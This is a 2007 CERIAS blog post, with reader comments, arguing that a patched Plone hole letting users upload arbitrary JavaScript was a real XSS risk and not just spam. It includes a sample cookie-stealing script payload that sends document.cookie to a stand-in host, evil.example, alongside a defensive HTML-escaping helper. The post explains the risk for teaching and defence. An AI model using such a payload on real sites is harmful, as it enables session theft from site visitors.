The Center for Education and Research in Information Assurance and Security (CERIAS)


Do Open Source Devs Get Web App Security?  Does Anybody?


Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is working with Plone, a CMS built atop Zope, pointed me to a rather disturbing document in the Plone documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The document describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript; apparently no input or output filtering was being done on the affected field.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If someone can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and sends it to another site.  Whether they’ll get something useful from that data varies from app to app, of course. What’s worrisome is that one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.
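To make the distinction concrete, here are two hypothetical payloads (illustrative sketches of the general XSS technique, not the actual Plone exploit): the “link spam” variant merely redirects, while the very same injection point can carry a cookie-stealing script.

```javascript
// Hypothetical XSS payloads -- illustrative only, NOT the actual Plone exploit.
// Both assume the attacker can get unfiltered markup onto a page.

// The "link spam" reading of the problem: injected script that merely redirects.
const spamPayload =
  '<script>window.location = "http://spam.example/";</script>';

// The security reading: the same injection point can exfiltrate a visitor's
// session cookie by smuggling document.cookie to an attacker-controlled host.
const theftPayload =
  '<script>new Image().src = "http://evil.example/log?c=" +' +
  ' encodeURIComponent(document.cookie);</script>';

console.log(theftPayload);
```

Any injection point that accepts the first payload accepts the second, which is why “it’s just spam” understates the risk.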

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curricula at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualified and unqualified developers are no longer the norm on most web dev teams.



Posted by Alexander Limi
on Tuesday, February 27, 2007 at 03:06 PM

It’s interesting that you should pick Plone (and Zope) as the basis for your “all frameworks suck at security” rant.

Plone has the best security track record of any major CMS, and when it comes to the framework part, Zope is doing really well too — people like Jim Fulton (the inventor of Zope) are credited with discovering entire classes of security vulnerabilities, and with being the first to protect against these threats. For more details, see the book Innocent Code:

Both Plone and Zope have dedicated security people that do code audits, and we take security very seriously.

Regarding the “this is not a security hole” statement, there’s a definite language barrier here, as what I’m trying to get across in the document is that there is no danger to your site data, server integrity or users from this exploit. We also fixed the issue within days, and I personally contacted all the high-profile Plone sites on the web, informing them about the issue.

We provided an immediate fix, we gave people detailed instructions and a script they could run to remove any spam content that had been added, and generally reacted in a swift and responsible manner.

That’s what I think is “getting security”: all code has potential holes in it; it’s how you respond to these problems that is the important part.

Posted by Alexander Limi
on Tuesday, February 27, 2007 at 03:15 PM

Oh, and for the record: Plone does input and output filtering for *everything*; there was one field where it didn’t work because of a bug, which is what we fixed. By random chance, these people happened to try this particular field as the basis for their code, and it happened to work.

Posted by Ed Finkler
on Tuesday, February 27, 2007 at 03:53 PM

You make a very important point—all code has holes, and all coders make mistakes. I certainly have made more than my share. Proper response when a vulnerability is discovered is key, and if your responses have been as described, it sounds like you’re handling things well.

To be clear, by no means do I mean to imply that Plone or Zope have chronic security problems. Rather, the particular article I quoted served as an example of what I view as a serious problem across the board in web application development. I certainly don’t think “all frameworks suck.” A *lot* of frameworks have problems, and a *whole lot* of web applications have serious security problems. I think that can mostly be attributed to serious deficiencies in developer education.

If the confusion does indeed arise from a language issue, that’s understandable. I do encourage you to consider rewording the article; as it is now, I think it does not properly express your intention.

Thanks for responding!

Posted by Alex
on Wednesday, February 28, 2007 at 06:52 AM

It strikes me as draconian to say that all developers must be familiar with security techniques, and that no developer without this knowledge should be eligible for hire.  Isn’t the goal of specialization of labor to let one group concentrate on one issue while a second group concentrates on another?  I would think the goal of a project manager is to ensure that his team has at least one member who is a security expert to audit the other non-security-acquainted members’ code.

I suppose you’ll counter that some minimal level of security knowledge should be required across the board, but to that I would most likely point out that most developers are already expected to understand things like filtering input/output and XSS, even if they do not know the more sophisticated manifestations of possible attacks.

Posted by Ed Finkler
on Wednesday, February 28, 2007 at 09:04 AM


“I would think the goal of a project manager is to ensure that his team has at least one member who is a security expert to audit the other non-security-acquainted members code.”

I disagree.  You’re asking for trouble if you have a single person responsible for security evaluation of others’ code — it’s a classic single point of failure, and contrary to the concept of multi-layered security.  While it certainly wouldn’t be a bad idea to have a security “lead,” I don’t think *any* programmer on your team should lack the knowledge of how common security attacks work, and how to block them.  Unfortunately, the vast majority of web developers lack this knowledge.

“I would most likely point out that most developers are expected to understand things like filtering input/output and XSS, even if they do not know the more sophisitcated manifestations of possible attacks.”

Unfortunately, your expectations don’t jibe with most web dev teams, or the hiring practices of organizations looking for web developers.  Certainly there are some that take this into account, but they are few and far between.

Posted by Sicurezza, ICT ed altro » Blog Archive &raqu
on Wednesday, February 28, 2007 at 12:45 PM

[...] An article I agree with, though not entirely. It’s true that many open source projects have neither the attention nor the competence to write secure code, but the problem is a general one of programmer competence; open source has little to do with it, for better or worse. It’s also true that if a project reaches a certain level of success, sooner or later someone who works in security is likely to take a look at it. Of course, the recent discussions about PHP security are not encouraging. [...]

Posted by Sigurd Magnusson, SilverStripe Open Source CMS
on Wednesday, February 28, 2007 at 06:48 PM

First of all, thanks for reiterating to the community of the importance of security.

Secondly, let’s put it in perspective. Security is always difficult to put resources toward, because commercial focus generally lies in innovation/new features. And to drive that point home: the one company that has more resources and less innovation than almost any other, Microsoft, has one of the worst security track records. Security is hard. It’s important and needs concentrated attention, but it’s a specialised skill area.

I agree with Alex that everyone should have basic security knowledge. In fact, all developers on a project should have basic knowledge spread across all areas of web development. But within our development team, we have people whose passion and deep expertise lie in different areas, and you cannot have them all in one person. It might be good coding practice, insane SQL knowledge, standards compliance, accessibility, AJAX/unobtrusive JavaScript, interaction design, internationalisation, performance, security — the list goes on… As you can see, it’s all a case of striking a careful balance between all areas of specialisation within your team.

All I can say is, at least with open source, bugs get found and fixed, fast and often, AND in order of consumer/user priority rather than commercial priority.

Posted by Ed Finkler
on Wednesday, February 28, 2007 at 07:27 PM

I think what I worry about is just what that level of “basic” knowledge should be.  I don’t think that understanding effective input and output filtering is any more difficult than understanding class inheritance, and I don’t think it’s unreasonable to expect both from a competent developer.  Knowing how to program web apps <em>securely</em> should be part and parcel with knowing how to program them <em>period</em>.
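As a rough sketch of what effective output filtering means in practice (a hypothetical helper written for this discussion, not any framework’s actual filter), HTML-escaping the five significant characters is enough to render an injected script tag inert:

```javascript
// Minimal HTML output-escaping helper -- a sketch, not any framework's real filter.
// Escapes the five characters that matter when emitting untrusted text into HTML.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must come first, or later entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// An injected script tag comes out as inert text instead of executing:
console.log(escapeHtml('<script>alert(document.cookie)</script>'));
// → &lt;script&gt;alert(document.cookie)&lt;/script&gt;
```

Note the ordering: ampersands are escaped first so that the entities produced by the later replacements aren’t themselves re-escaped.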

Posted by AqD
on Thursday, March 1, 2007 at 03:04 AM

I live in .tw and here it’s more a problem of our customers than developers. Most of our customers, including many IT guys, just don’t care about website security at all. As a result, most developers (whether qualified or not) just ignore that part, since nobody pays for it.

Posted by Stephan
on Wednesday, March 14, 2007 at 06:18 AM

I think it’s almost impossible to become a solid developer without having come across basic information and techniques regarding security issues in your language of choice.  However, pushy managers, tight deadlines and long hours contribute heavily to pushing security measures to the back burner. For any commercial-grade product, though, a large part of the burden of discovering security holes lies with competent product, system and regression testers.  Running security test scenarios as part of your testing efforts will go a long way toward flushing out overlooked security holes — unless of course you are simply relying on unit testing as being good enough, in which case security holes are just going to be the start of your troubles.
